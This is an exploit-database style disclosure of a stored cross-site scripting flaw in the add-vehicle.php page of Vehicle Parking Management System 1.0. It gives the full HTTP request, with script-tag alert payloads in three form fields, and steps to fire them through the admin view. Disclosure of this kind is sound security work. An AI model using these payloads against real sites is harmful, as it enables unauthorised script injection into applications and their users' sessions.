Vehicle Parking Management System version 1.0 suffers from a persistent cross site scripting vulnerability. Original discovery of persistent cross site scripting in this version is attributed to Tushar Vaidya in February of 2021.
ac9f28e3fc856df19b30c3f0ff99cfb6# Exploit Title: Vehicle Parking Management System - Stored Cross-Site-Scripting (XSS)
# Date: 2021-07-09
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10, XAMPP
################
# Description #
################
# The system is vulnerable to Stored XSS on add-vehicle.php endpoint.
########
# PoC #
########
PoC ) param vehcomp,vehreno,ownername - Stored XSS
Payload: 1;<script>alert(1);</script>
Request:
========
POST /vpms/add-vehicle.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------39455081863880051020862918006
Content-Length: 842
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/vpms/add-vehicle.php
Cookie: PHPSESSID=01nt1pa7lgtioktv5ii907c8l3
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="catename"
Bicycles
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="vehcomp"
1;<script>alert(1);</script>
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="vehreno"
2;<script>alert(2);</script>
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="ownername"
3;<script>alert(3);</script>
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="ownercontno"
7627637673
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="submit"
-----------------------------39455081863880051020862918006--
############
# Fire up #
############
1) Goto: Login as Admin
2) Goto: Manage Vehicle -> Manage In Vehicle -> Click view
3) Stored XSS payloads are fired